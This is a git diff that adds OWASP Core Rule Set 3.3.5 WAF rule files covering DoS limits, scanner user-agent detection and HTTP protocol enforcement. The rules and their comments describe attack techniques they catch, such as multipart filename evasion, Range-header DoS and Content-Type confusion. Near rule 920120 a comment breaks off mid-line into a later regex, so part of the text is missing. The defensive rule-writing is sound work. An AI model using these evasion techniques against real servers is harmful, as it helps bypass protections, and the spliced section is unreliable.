tag:'attack-dos',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/227/469',\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'ip.dos_block=1',\ + expirevar:'ip.dos_block=%{tx.dos_block_timeout}'" + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:912015,phase:1,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:912016,phase:2,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" +# +# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:912017,phase:1,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:912018,phase:2,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION" +# +# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# + + + +# +# -= Paranoia Levels Finished =- +# +SecMarker "END-REQUEST-912-DOS-PROTECTION" + +SecMarker "END-DOS-PROTECTION-CHECKS" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-913-SCANNER-DETECTION.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-913-SCANNER-DETECTION.conf new file mode 100644 index 000000000..6e12d0866 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-913-SCANNER-DETECTION.conf @@ -0,0 +1,199 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.3.3.5 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:913011,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:913012,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" +# +# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# + +# +# -=[ Vulnerability Scanner Checks ]=- +# +# These rules inspect the default User-Agent and Header values sent by +# various commercial and open source vuln scanners. +# +# The following rules contain User-Agent lists: +# 913100 - security scanners (data file scanners-user-agents.data) +# 913101 - scripting/generic HTTP clients (data file scripting-user-agents.data) +# 913102 - web crawlers/bots (data file crawlers-user-agents.data) +# +SecRule REQUEST_HEADERS:User-Agent "@pmFromFile scanners-user-agents.data" \ + "id:913100,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'Found User-Agent associated with security scanner',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-reputation-scanner',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/118/224/541/310',\ + tag:'PCI/6.5.10',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'ip.reput_block_flag=1',\ + setvar:'ip.reput_block_reason=%{rule.msg}',\ + expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" + +SecRule REQUEST_HEADERS_NAMES|REQUEST_HEADERS "@pmFromFile scanners-headers.data" \ + "id:913110,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'Found request header associated with security scanner',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-reputation-scanner',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/118/224/541/310',\ + tag:'PCI/6.5.10',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'ip.reput_block_flag=1',\ + setvar:'ip.reput_block_reason=%{rule.msg}',\ + expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" + + + +SecRule REQUEST_FILENAME|ARGS "@pmFromFile scanners-urls.data" \ + "id:913120,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'Found request filename/argument associated with security scanner',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-reputation-scanner',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/118/224/541/310',\ + tag:'PCI/6.5.10',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'ip.reput_block_flag=1',\ + setvar:'ip.reput_block_reason=%{rule.msg}',\ + expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:913013,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:913014,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" +# +# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# + + +# +# -=[ Scripting/Generic User-Agents ]=- +# +# This rule detects user-agents associated with various HTTP client libraries +# and scripting languages. Detection suggests attempted access by some +# automated tool. +# +# This rule is a sibling of rule 913100. +# +SecRule REQUEST_HEADERS:User-Agent "@pmFromFile scripting-user-agents.data" \ + "id:913101,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'Found User-Agent associated with scripting/generic HTTP client',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-reputation-scripting',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/118/224/541/310',\ + tag:'PCI/6.5.10',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}',\ + setvar:'ip.reput_block_flag=1',\ + setvar:'ip.reput_block_reason=%{rule.msg}',\ + expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" + + + +# +# -=[ Crawler User-Agents ]=- +# +# This rule detects user-agents associated with various crawlers, SEO tools, +# and bots, which have been reported to potentially misbehave. +# These crawlers can have legitimate uses when used with authorization. +# +# This rule is a sibling of rule 913100. +# +SecRule REQUEST_HEADERS:User-Agent "@pmFromFile crawlers-user-agents.data" \ + "id:913102,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'Found User-Agent associated with web crawler/bot',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-reputation-crawler',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/118/224/541/310',\ + tag:'PCI/6.5.10',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}',\ + setvar:'ip.reput_block_flag=1',\ + setvar:'ip.reput_block_reason=%{rule.msg}',\ + expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:913015,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:913016,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" +# +# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:913017,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:913018,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" +# +# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# + + + +# +# -= Paranoia Levels Finished =- +# +SecMarker "END-REQUEST-913-SCANNER-DETECTION" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf new file mode 100644 index 000000000..7f3138797 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf @@ -0,0 +1,1685 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.3.3.5 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# Some protocol violations are common in application layer attacks. +# Validating HTTP requests eliminates a large number of application layer attacks. +# +# The purpose of this rules file is to enforce HTTP RFC requirements that state how +# the client is supposed to interact with the server. +# https://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html + + + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:920011,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:920012,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +# +# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# + +# +# Validate request line against the format specified in the HTTP RFC +# +# -=[ Rule Logic ]=- +# +# Uses rule negation against the regex for positive security. The regex specifies the proper +# construction of URI request lines such as: +# +# "http:" "//" host [ ":" port ] [ abs_path [ "?" query ]] +# +# It also outlines proper construction for CONNECT, OPTIONS and GET requests. +# +# -=[ References ]=- +# https://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html#sec3.2.1 +# http://capec.mitre.org/data/definitions/272.html +# +SecRule REQUEST_LINE "!@rx ^(?i:(?:[a-z]{3,10}\s+(?:\w{3,7}?://[\w\-\./]*(?::\d+)?)?/[^?#]*(?:\?[^#\s]*)?(?:#[\S]*)?|connect (?:\d{1,3}\.){3}\d{1,3}\.?(?::\d+)?|options \*)\s+[\w\./]+|get /[^?#]*(?:\?[^#\s]*)?(?:#[\S]*)?)$" \ + "id:920100,\ + phase:2,\ + block,\ + t:none,\ + msg:'Invalid HTTP Request Line',\ + logdata:'%{request_line}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'WARNING',\ + setvar:'tx.anomaly_score_pl1=+%{tx.warning_anomaly_score}'" + + +# +# Identify multipart/form-data name evasion attempts +# +# There are possible impedance mismatches between how +# ModSecurity interprets multipart file names and how +# a destination app server such as PHP might parse the +# Content-Disposition data: +# +# filename-parm := "filename" "=" value +# +# -=[ Rule Logic ]=- +# These rules check for the existence of the ' " ; = meta-characters in +# either the file or file name variables. +# HTML entities may lead to false positives, why they are allowed on PL1. +# Negative look behind assertions allow frequently used entities &_; +# +# -=[ Targets, characters and html entities ]=- +# +# 920120: PL1 : FILES_NAMES, FILES +# ['\";=] but allowed: +# &[aAoOuUyY]uml); &[aAeEiIoOuU]circ; &[eEiIoOuUyY]acute; +# &[aAeEiIoOuU]grave; &[cC]cedil; &[aAnNoO]tilde; & ' +# +# 920121: PL2 : FILES_NAMES, FILES +# ['\";=] : ' " ; = meta-characters +# +# Not supported by re2 (?@-]+)*$" \ + "id:920470,\ + phase:1,\ + block,\ + t:none,t:lowercase,\ + msg:'Illegal Content-Type header',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# In case Content-Type header can be parsed, check the mime-type against +# the policy defined in the 'allowed_request_content_type' variable. +# To change your policy, edit crs-setup.conf and activate rule 900220. +SecRule REQUEST_HEADERS:Content-Type "@rx ^[^;\s]+" \ + "id:920420,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Request content type is not allowed by policy',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.content_type=|%{tx.0}|',\ + chain" + SecRule TX:content_type "!@within %{tx.allowed_request_content_type}" \ + "t:lowercase,\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# Restrict charset parameter within the content-type header +# +SecRule REQUEST_HEADERS:Content-Type "@rx charset\s*=\s*[\"']?([^;\"'\s]+)" \ + "id:920480,\ + phase:1,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'Request content type charset is not allowed by policy',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + chain" + SecRule TX:1 "!@rx ^%{tx.allowed_request_content_type_charset}$" \ + "t:none,\ + ctl:forceRequestBodyVariable=On,\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Restrict charset parameter inside content type header to occur max once. +# +SecRule REQUEST_HEADERS:Content-Type "@rx charset.*?charset" \ + "id:920530,\ + phase:1,\ + block,\ + t:none,t:lowercase,\ + msg:'Multiple charsets detected in content type header',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Restrict protocol versions. +# +SecRule REQUEST_PROTOCOL "!@within %{tx.allowed_http_versions}" \ + "id:920430,\ + phase:1,\ + block,\ + t:none,\ + msg:'HTTP protocol version is not allowed by policy',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'PCI/6.5.10',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Restrict file extension +# +SecRule REQUEST_BASENAME "@rx \.([^.]+)$" \ + "id:920440,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'URL file extension is restricted by policy',\ + logdata:'%{TX.0}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'PCI/6.5.10',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.extension=.%{tx.1}/',\ + chain" + SecRule TX:EXTENSION "@within %{tx.restricted_extensions}" \ + "t:none,t:urlDecodeUni,t:lowercase,\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Backup or "working" file extension +# example: index.php~, /index.php~/foo/ +# +SecRule REQUEST_FILENAME "@rx \.[^.~]+~(?:/.*|)$" \ + "id:920500,\ + phase:2,\ + block,\ + t:none,t:urlDecodeUni,\ + msg:'Attempt to access a backup or working file',\ + logdata:'%{TX.0}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'PCI/6.5.10',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Restricted HTTP headers +# +# -=[ Rule Logic ]=- +# The use of certain headers is restricted. They are listed in the variable +# TX.restricted_headers. +# +# The headers are transformed into lowercase before the match. In order to +# make sure that only complete header names are matching, the names in +# TX.restricted_headers are wrapped in slashes. This guarantees that the +# header Range (-> /range/) is not matching the restricted header +# /content-range/ for example. +# +# This is a chained rule, where the first rule fills a set of variables of the +# form TX.header_name_. The second rule is then executed for all +# variables of the form TX.header_name_. +# +# As a consequence of the construction of the rule, the alert message and the +# alert data will not display the original header name Content-Range, but +# /content-range/ instead. +# +# +# -=[ References ]=- +# https://access.redhat.com/security/vulnerabilities/httpoxy (Header Proxy) +# +SecRule REQUEST_HEADERS_NAMES "@rx ^.*$" \ + "id:920450,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'HTTP header is restricted by policy (%{MATCHED_VAR})',\ + logdata:'Restricted header detected: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.header_name_%{tx.0}=/%{tx.0}/',\ + chain" + SecRule TX:/^header_name_/ "@within %{tx.restricted_headers}" \ + "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Restrict response charsets that we allow. +# The following rules make sure that the response will be in an ASCII-compatible charset that +# phase 4 rules can properly understand and block. +# + +# +# Some servers rely on the request Accept header to determine what charset to respond with. +# This rule restricts these to familiar charsets. +# +# Regular expression generated from util/regexp-assemble/data/920600.data. +# To update the regular expression run the following shell script +# (consult util/regexp-assemble/README.md for details): +# util/regexp-assemble/regexp-assemble.py update 920600 +# +SecRule REQUEST_HEADERS:Accept "!@rx ^(?:(?:\*|[^\"(),\/:;<=>?![\x5c\]{}]+)\/(?:\*|[^\"(),\/:;<=>?![\x5c\]{}]+))(?:\s*+;\s*+(?:(?:charset\s*+=\s*+(?:\"?(?:iso-8859-15?|windows-1252|utf-8)\b\"?))|(?:(?:c(?:h(?:a(?:r(?:s(?:e[^t\"(),\/:;<=>?![\x5c\]{}]|[^e\"(),/:;<=>?![\x5c\]{}])|[^s\"(),/:;<=>?![\x5c\]{}])|[^r\"(),/:;<=>?![\x5c\]{}])|[^a\"(),/:;<=>?![\x5c\]{}])|[^h\"(),/:;<=>?![\x5c\]{}])|[^c\"(),/:;<=>?![\x5c\]{}])[^\"(),/:;<=>?![\x5c\]{}]*(?:)\s*+=\s*+[^(),/:;<=>?![\x5c\]{}]+)|;?))*(?:\s*+,\s*+(?:(?:\*|[^\"(),\/:;<=>?![\x5c\]{}]+)\/(?:\*|[^\"(),\/:;<=>?![\x5c\]{}]+))(?:\s*+;\s*+(?:(?:charset\s*+=\s*+(?:\"?(?:iso-8859-15?|windows-1252|utf-8)\b\"?))|(?:(?:c(?:h(?:a(?:r(?:s(?:e[^t\"(),\/:;<=>?![\x5c\]{}]|[^e\"(),/:;<=>?![\x5c\]{}])|[^s\"(),/:;<=>?![\x5c\]{}])|[^r\"(),/:;<=>?![\x5c\]{}])|[^a\"(),/:;<=>?![\x5c\]{}])|[^h\"(),/:;<=>?![\x5c\]{}])|[^c\"(),/:;<=>?![\x5c\]{}])[^\"(),/:;<=>?![\x5c\]{}]*(?:)\s*+=\s*+[^(),/:;<=>?![\x5c\]{}]+)|;?))*)*$" \ + "id:920600,\ + phase:1,\ + block,\ + t:none,t:lowercase,\ + msg:'Illegal Accept header: charset parameter',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# The following rule (920620) checks for the presence of 2 or more request Content-Type headers. +# Content-Type confusion poses a significant security risk to a web application. It occurs when +# the server and client have different interpretations of the Content-Type header, leading to +# miscommunication, potential exploitation and WAF bypass. +# +# Using Apache, when multiple Content-Type request headers are received, the server combines them +# into a single header with the values separated by commas. For example, if a client sends multiple +# Content-Type headers with values "application/json" and "text/plain", Apache will combine them +# into a single header like this: "Content-Type: application/json, text/plain". +# +# On the other hand, Nginx handles multiple Content-Type headers differently. It preserves each +# header as a separate entity without combining them. So, if a client sends multiple Content-Type +# headers, Nginx will keep them separate, maintaining the original values. +# +SecRule &REQUEST_HEADERS:Content-Type "@gt 1" \ + "id:920620,\ + phase:1,\ + block,\ + t:none,\ + msg:'Multiple Content-Type Request Headers',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:920013,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:920014,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +# +# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# + +# +# -=[ Rule Logic ]=- +# +# Check the number of range fields in the Range request header. +# +# An excessive number of Range request headers can be used to DoS a server. +# The original CVE proposed an arbitrary upper limit of 5 range fields. +# +# Several clients are known to request PDF fields with up to 62 range +# fields. Therefore the standard rule does not cover PDF files. This is +# performed in two separate (stricter) siblings of this rule. +# +# 920200: PL2: Limit of 5 range header fields for all filenames outside of PDFs +# 920201: PL2: Limit of 62 range header fields for PDFs +# 920202: PL4: Limit of 5 range header fields for PDFs +# +# -=[ References ]=- +# https://httpd.apache.org/security/CVE-2011-3192.txt + + +SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){6}" \ + "id:920200,\ + phase:2,\ + block,\ + t:none,\ + msg:'Range: Too many fields (6 or more)',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'WARNING',\ + chain" + SecRule REQUEST_BASENAME "!@endsWith .pdf" \ + "setvar:'tx.anomaly_score_pl2=+%{tx.warning_anomaly_score}'" + +# +# This is a sibling of rule 920200 +# + +SecRule REQUEST_BASENAME "@endsWith .pdf" \ + "id:920201,\ + phase:2,\ + block,\ + t:none,\ + msg:'Range: Too many fields for pdf request (63 or more)',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'WARNING',\ + chain" + SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){63}" \ + "setvar:'tx.anomaly_score_pl2=+%{tx.warning_anomaly_score}'" + + +SecRule ARGS "@rx %[0-9a-fA-F]{2}" \ + "id:920230,\ + phase:2,\ + block,\ + t:none,\ + msg:'Multiple URL Encoding Detected',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153/267/120',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'WARNING',\ + setvar:'tx.anomaly_score_pl2=+%{tx.warning_anomaly_score}'" + + +# +# Missing Accept Header +# +# -=[ Rule Logic ]=- +# This rule generates a notice if the Accept header is missing. +# +# Notice: The rule tries to avoid known false positives by ignoring +# OPTIONS requests coming from known offending User-Agents via two +# chained rules. +# As ModSecurity only reports the match of the last matching rule, +# the alert is misleading. +# +SecRule &REQUEST_HEADERS:Accept "@eq 0" \ + "id:920300,\ + phase:2,\ + pass,\ + t:none,\ + msg:'Request Missing an Accept Header',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'PCI/6.5.10',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'NOTICE',\ + chain" + SecRule REQUEST_METHOD "!@rx ^OPTIONS$" \ + "chain" + SecRule REQUEST_HEADERS:User-Agent "!@pm AppleWebKit Android" \ + "t:none,\ + setvar:'tx.anomaly_score_pl2=+%{tx.notice_anomaly_score}'" + +# +# PL2: This is a stricter sibling of 920270. +# +SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 9,10,13,32-126,128-255" \ + "id:920271,\ + phase:2,\ + block,\ + t:none,t:urlDecodeUni,\ + msg:'Invalid character in request (non printable characters)',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + + +# +# Missing User-Agent Header +# +# -=[ Rule Logic ]=- +# This rules will check to see if there is a User-Agent header or not. +# + +SecRule &REQUEST_HEADERS:User-Agent "@eq 0" \ + "id:920320,\ + phase:2,\ + pass,\ + t:none,\ + msg:'Missing User Agent Header',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'PCI/6.5.10',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'NOTICE',\ + setvar:'tx.anomaly_score_pl2=+%{tx.notice_anomaly_score}'" + + +# +# PL2: This is a stricter sibling of 920120. +# +SecRule FILES_NAMES|FILES "@rx ['\";=]" \ + "id:920121,\ + phase:2,\ + block,\ + t:none,t:urlDecodeUni,\ + msg:'Attempted multipart/form-data bypass',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +# +# PL2: Block on Missing Content-Type Header with Request Body +# This is a stricter sibling of rule 920340. +# +# -=[ References ]=- +# http://httpwg.org/specs/rfc7231.html#header.content-type + +SecRule REQUEST_HEADERS:Content-Length "!@rx ^0$" \ + "id:920341,\ + phase:2,\ + block,\ + t:none,\ + msg:'Request Containing Content Requires Content-Type header',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + chain" + SecRule &REQUEST_HEADERS:Content-Type "@eq 0" \ + "t:none,\ + 